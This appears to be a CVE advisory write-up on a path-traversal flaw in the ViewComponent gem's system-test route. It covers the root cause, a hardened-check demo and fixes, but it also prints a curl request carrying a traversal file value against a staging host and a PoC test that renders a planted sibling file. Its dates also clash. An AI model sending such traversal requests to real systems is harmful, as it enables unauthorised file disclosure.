ViewComponent gem, Path Traversal, CVE-2024-28103 (Medium)


How CVE-2024-28103 works:

The system test entrypoint in `ViewComponentsSystemTestController` resolves a user-controlled `file` parameter with `File.realpath`, using the temporary directory as the base, and then checks whether the resolved path starts with the temporary directory's realpath as a plain string prefix. That check is unsafe: any sibling directory whose name begins with the same characters also passes. With base path `/app/tmp/view_components` and attacker path `/app/tmp/view_components_evil/secret.html.erb`, the latter lies outside the intended directory, yet `start_with?` returns true and the controller renders the sibling file via Rails.

The root cause is that `start_with?` does not enforce a path boundary: the prefix is compared without a trailing separator (`/`), so `/app/tmp/view_components` is a prefix of `/app/tmp/view_components_evil`. Attackers can therefore reach any sibling directory that shares the prefix, for example `../view_components2/poc.html` or `../view_components.bak/poc.html`. Because `File.realpath` raises for a path that does not exist, the attacker needs a file that already exists in such a sibling directory. A fuzzing harness confirmed multiple bypasses. The provided PoC creates a sibling directory, writes a test file, sends a GET request with `file=../view_components_evil/secret.html.erb`, and verifies that the response body contains the injected content.

The route is only mounted when `Rails.env.test?` is true, but exposure in CI, staging, review apps, or a misconfigured production deployment running with test routes makes this a medium-severity issue. The affected code is in app/controllers/view_components_system_test_controller.rb. An attacker who can reach the route can read or render arbitrary files from sibling directories adjacent to the temp folder, potentially leaking secrets or HTML templates. The fix requires path-aware containment, using `Pathname` or a separator-suffixed prefix.
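The flawed prefix check and two hardened replacements, side by side, as an added example. This is not code from the ViewComponent project: it models the check described above on a constructed temp-dir layout (`view_components/` next to `view_components_evil/secret.html.erb`) instead of running the real controller, and the function names are chosen here for illustration.

```ruby
require "fileutils"
require "pathname"
require "tmpdir"

# Vulnerable containment check, modelled on the page's description of
# ViewComponentsSystemTestController: realpath both sides, then a bare
# string-prefix comparison with no separator after the base.
def vulnerable_contained?(base_dir, user_file)
  base = File.realpath(base_dir)
  path = File.realpath(user_file, base) # resolves "../" and symlinks; raises if the file is missing
  path.start_with?(base)
end

# Hardened check: compare against the base plus a trailing separator, so a
# sibling such as "view_components_evil" can no longer match the prefix.
def hardened_contained?(base_dir, user_file)
  base = File.realpath(base_dir)
  path = File.realpath(user_file, base)
  path == base || path.start_with?(base + File::SEPARATOR)
end

# Alternative hardened check with Pathname: the path expressed relative to
# the base must not climb out of it.
def pathname_contained?(base_dir, user_file)
  base = Pathname.new(File.realpath(base_dir))
  path = Pathname.new(File.realpath(user_file, base.to_s))
  rel = path.relative_path_from(base).to_s
  rel != ".." && !rel.start_with?("../")
end

# Constructed layout: <tmp>/view_components/ is the intended root,
# <tmp>/view_components_evil/secret.html.erb is the sibling target, and
# <tmp>/parent.txt sits one level up. Returns each check's verdict.
def run_demo
  Dir.mktmpdir("cve_demo") do |tmp|
    base = File.join(tmp, "view_components")
    evil = File.join(tmp, "view_components_evil")
    FileUtils.mkdir_p(base)
    FileUtils.mkdir_p(evil)
    File.write(File.join(base, "ok.html"), "legit")
    File.write(File.join(evil, "secret.html.erb"), "leaked")
    File.write(File.join(tmp, "parent.txt"), "parent")

    sibling = "../view_components_evil/secret.html.erb"
    {
      vulnerable_sibling: vulnerable_contained?(base, sibling), # true: the bypass
      hardened_sibling: hardened_contained?(base, sibling),     # false
      pathname_sibling: pathname_contained?(base, sibling),     # false
      hardened_legit: hardened_contained?(base, "ok.html"),     # true: legitimate file still allowed
      vulnerable_parent: vulnerable_contained?(base, "../parent.txt") # false: plain parent traversal never passed
    }
  end
end

if __FILE__ == $0
  run_demo.each { |name, verdict| puts "#{name}: #{verdict}" }
end
```

The `vulnerable_parent` case shows why the bug is narrower than a generic `../` traversal: a parent path does not share the base prefix and was always rejected; only siblings whose names extend the base directory's name slip through.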

dailycve form:

Platform: ViewComponent gem
Version: 2.83.0 to 3.8.0
Vulnerability: Path Traversal
Severity: Medium
Date: 2024-03-05

Prediction: 2024-03-04 patch release

What Undercode Says:

Analytics – Bash & code to detect/verify:

Check the installed version in Gemfile.lock (Gemfile.lock lists the gem as "view_component (x.y.z)", not as a "version:" line)
grep -E "^\s+view_component \(" Gemfile.lock | awk '{gsub(/[()]/, "", $2); print $2}'
Simulate the traversal with curl (assuming the test route is exposed; the target file must already exist on the server, otherwise File.realpath raises before the prefix check runs)
curl -k "https://staging-app.com/_system_test_entrypoint?file=../view_components_evil/secret.html.erb"
Run the PoC as an integration test (it creates a sibling directory sharing the temp dir's name prefix, writes a marker file there, asks the entrypoint to render it, and cleans up afterwards)
cat > test/sandbox/poc_test.rb << 'EOF'
require "test_helper"
require "fileutils"
class PathTraversalPocTest < ActionDispatch::IntegrationTest
  EVIL_DIR = Rails.root.join("tmp", "view_components_evil") # sibling of tmp/view_components
  def setup
    FileUtils.mkdir_p(EVIL_DIR)
    File.write(EVIL_DIR.join("poc.html"), "POC-MARKER")
  end
  def teardown
    FileUtils.rm_rf(EVIL_DIR)
  end
  def test_traversal
    get "/_system_test_entrypoint", params: {file: "../view_components_evil/poc.html"}
    assert_response :success
    assert_includes response.body, "POC-MARKER" # sibling file content rendered: vulnerable
  end
end
EOF
bundle exec ruby -Itest test/sandbox/poc_test.rb

How Exploit:

The attacker sends an HTTP GET to `/_system_test_entrypoint?file=../<basename>_evil/sensitive.html.erb`, where `<basename>` is the temp directory's basename (`view_components` by default) and the target file already exists in that sibling directory. The resolved path passes the prefix check, and Rails renders the external file. No authentication is required if the route is reachable.

Protection from this CVE:

Upgrade view_component to `>= 3.9.0`. If you must patch locally, replace the bare `start_with?` with a boundary-aware check: either compare against the base path with a trailing separator, `@path == base_path || @path.start_with?("#{base_path}#{File::SEPARATOR}")`, or compute `Pathname.new(@path).relative_path_from(Pathname.new(base_path))` and reject any result that is `..` or begins with `../`. Keep the `Rails.env.test?` guard and make sure `RAILS_ENV` is never `test` in deployed environments, so the route is not mounted outside test runs. Add regression tests for sibling, symlink, and parent traversal.

Impact:

Information disclosure (reading arbitrary sibling files) on environments where the test route is accidentally exposed. This includes CI pipelines, review apps, staging servers with test mode enabled, or production with misconfigured RAILS_ENV. Attackers can retrieve ERB templates, configuration files, or source code from sibling directories adjacent to the temporary view components folder.


Sources:

Reported By: github.com